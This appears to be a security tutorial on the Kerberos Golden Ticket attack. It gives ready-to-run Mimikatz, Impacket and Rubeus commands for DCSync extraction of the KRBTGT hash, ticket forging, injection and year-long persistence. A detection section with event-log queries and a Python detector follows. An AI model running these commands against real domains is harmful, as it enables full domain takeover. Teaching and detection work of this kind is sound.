Golden Ticket Attack
Master the most powerful Kerberos attack for domain persistence.
Objectives
- Understand Golden Ticket attack methodology
- Learn KRBTGT hash extraction techniques
- Master Golden Ticket creation and injection
- Implement domain-wide persistence
What is a Golden Ticket?
A Golden Ticket is a forged Ticket Granting Ticket (TGT) that allows an attacker to impersonate any user in the domain, including domain administrators.
Golden Ticket Characteristics:
- Domain-wide access: Can access any resource in the domain
- Long-term persistence: Valid until the forged ticket's chosen expiry, which the forger sets (see Long-term Persistence below)
- User impersonation: Can impersonate any user account
- Bypasses authentication: No valid user credentials are needed once the KRBTGT hash is known
Prerequisites for Golden Ticket Attack
To create a Golden Ticket, an attacker needs:
1. KRBTGT Account Hash
The KRBTGT account hash is the master key used to encrypt and sign all TGTs in the domain.
Extraction Methods:
- DCSync Attack: Replicate password data from Domain Controller
- LSASS Memory: Extract from Domain Controller memory
- NTDS.dit: Extract from Active Directory database
- Volume Shadow Copy: Backup extraction techniques
2. Domain SID
The Domain Security Identifier is required to create valid SIDs for the forged ticket.
# Get Domain SID using PowerShell
Get-ADDomain | Select-Object DomainSID
# Alternative method: returns the krbtgt user SID; the domain SID is that value without the trailing -502 RID
wmic useraccount where name="krbtgt" get sid
3. Domain Name
The fully qualified domain name (FQDN) is required for ticket creation.
Golden Ticket Creation Process
Step 1: KRBTGT Hash Extraction
Extract the KRBTGT account hash using DCSync attack:
# Using Mimikatz
mimikatz # lsadump::dcsync /domain:corp.local /user:krbtgt
# Using Impacket
secretsdump.py -dc-ip 192.168.1.10 corp.local/compromised_user:password@192.168.1.10
# Using Rubeus
Rubeus.exe dcsync /user:krbtgt /domain:corp.local
Step 2: Golden Ticket Creation
Create the Golden Ticket using the extracted hash:
# Using Mimikatz
mimikatz # kerberos::golden /domain:corp.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /krbtgt:aad3b435b51404eeaad3b435b51404ee:1234567890abcdef1234567890abcdef /user:administrator /id:500 /groups:512,513,518,519,520
# Using Rubeus
Rubeus.exe golden /rc4:aad3b435b51404eeaad3b435b51404ee:1234567890abcdef1234567890abcdef /domain:corp.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /user:administrator /groups:512,513,518,519,520
Step 3: Ticket Injection
Inject the Golden Ticket into memory:
# Using Mimikatz
mimikatz # kerberos::ptt ticket.kirbi
# Using Rubeus
Rubeus.exe ptt /ticket:ticket.kirbi
# Using PowerShell: this requests a service ticket for an SPN using whatever TGT is already in the session
# (it exercises an injected ticket; it does not inject one itself)
Add-Type -AssemblyName System.IdentityModel
[System.IdentityModel.Tokens.KerberosRequestorSecurityToken]::new("service/corp.local")
Advanced Golden Ticket Techniques
1. Custom PAC Creation
Create Golden Tickets with custom PAC data for specific access:
# Create Golden Ticket with custom groups
mimikatz # kerberos::golden /domain:corp.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /krbtgt:hash /user:serviceaccount /id:1001 /groups:512 /sids:S-1-5-21-1234567890-1234567890-1234567890-519 /ticket:serviceaccount.kirbi
2. Cross-Domain Golden Tickets
Create Golden Tickets for trusted domains:
# Create Golden Ticket for trusted domain
mimikatz # kerberos::golden /domain:trusted.local /sid:S-1-5-21-0987654321-0987654321-0987654321 /krbtgt:trusted_hash /user:administrator /ticket:trusted_golden.kirbi
3. Long-term Persistence
Create Golden Tickets with extended lifetimes:
# Golden Ticket valid for 525600 minutes (one year); mimikatz's default lifetime is 10 years, far beyond the domain's 10-hour default
mimikatz # kerberos::golden /domain:corp.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /krbtgt:hash /user:administrator /startoffset:0 /endin:525600 /renewmax:525600
Golden Ticket Detection
Detecting Golden Ticket attacks requires monitoring specific events and behaviors.
Detection Indicators
- Event ID 4769: Kerberos service ticket was requested (a 4769 for an account with no preceding 4768 TGT request is the key indicator, since the KDC never issued the forged TGT)
- Event ID 4770: Kerberos service ticket was renewed
- Event ID 4771: Kerberos pre-authentication failed
- Unusual authentication patterns: Logins from unexpected locations
- Ticket lifetimes: Unusually long ticket lifetimes (the domain default is 10 hours; lifetimes are visible with klist on the host, not in 4769 events)
Monitoring Commands
# Monitor for Golden Ticket indicators
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4769} | Where-Object {$_.Message -match "krbtgt"}
# Check for unusual ticket lifetimes on a host (4769 events do not record ticket lifetime)
klist | Select-String "Start Time", "End Time", "Renew Time"
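As an added example that is not part of this page, the following Python sketch applies the first detection indicator above to constructed sample events: a 4769 service-ticket request from an account and client that never requested a TGT (4768), or did so longer ago than the domain's TGT lifetime, is flagged, because a forged TGT is never issued by the KDC. It assumes events already parsed into tuples and that Kerberos Authentication Service auditing is enabled on every DC whose logs are collected.

```python
"""Flag 4769 (TGS request) events with no recent 4768 (TGT request) for the same account/client."""
from datetime import datetime, timedelta

# Constructed sample events, not real logs: (timestamp, event_id, account, client_ip).
SAMPLE_EVENTS = [
    ("2024-05-01T08:00:00", 4768, "alice@CORP.LOCAL", "10.0.0.5"),
    ("2024-05-01T08:00:02", 4769, "alice@CORP.LOCAL", "10.0.0.5"),         # normal: TGT then TGS
    ("2024-05-01T09:15:00", 4769, "Administrator@CORP.LOCAL", "10.0.0.77"),  # TGS with no TGT at all
    ("2024-05-01T09:15:30", 4769, "Administrator@CORP.LOCAL", "10.0.0.77"),
    ("2024-05-01T07:00:00", 4768, "bob@CORP.LOCAL", "10.0.0.9"),
    ("2024-05-01T19:30:00", 4769, "bob@CORP.LOCAL", "10.0.0.9"),           # TGT is 12.5 h old: stale
]


def find_tgs_without_tgt(events, window=timedelta(hours=10)):
    """Return (timestamp, account, client_ip) for every 4769 whose (account, client)
    has no 4768 within `window` before it. `window` defaults to the domain's default
    TGT lifetime of 10 hours; set it to your domain's "Maximum lifetime for user ticket".
    Caveat: a TGT obtained from a DC whose log is not in `events` will look forged,
    so feed this the merged logs of all DCs."""
    last_tgt = {}      # (account, client_ip) -> time of most recent 4768
    suspicious = []
    # ISO-8601 strings sort chronologically, so sorting the tuples orders by time.
    for ts_str, event_id, account, ip in sorted(events):
        ts = datetime.fromisoformat(ts_str)
        key = (account.lower(), ip)
        if event_id == 4768:
            last_tgt[key] = ts
        elif event_id == 4769:
            issued = last_tgt.get(key)
            if issued is None or ts - issued > window:
                suspicious.append((ts_str, account, ip))
    return suspicious


if __name__ == "__main__":
    for hit in find_tgs_without_tgt(SAMPLE_EVENTS):
        print("TGS request without a matching TGT request:", hit)
```

A 4769 for a renewed TGT is preceded by 4770 rather than 4768, so in a domain that relies on renewals you would treat 4770 the same way as 4768 before acting on a hit.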
Golden Ticket Limitations
Understanding the limitations helps in both attack and defense scenarios.
Technical Limitations
- Domain boundary: Valid only for the domain whose KRBTGT hash was used; other domains need their own KRBTGT hash or a trust path (see Cross-Domain Golden Tickets)
- KRBTGT rotation: Invalidated when the KRBTGT password changes; because the KDC also accepts tickets encrypted with the previous KRBTGT key, the password must be reset twice before forged tickets stop working
- PAC validation: Some services validate PAC integrity
- Encryption types: Limited by supported encryption types
Operational Limitations
- Detection risk: Can be detected through monitoring
- Forensic evidence: Leaves traces in logs
- Network requirements: Requires network connectivity to DC
- Service dependencies: Some services may not accept forged tickets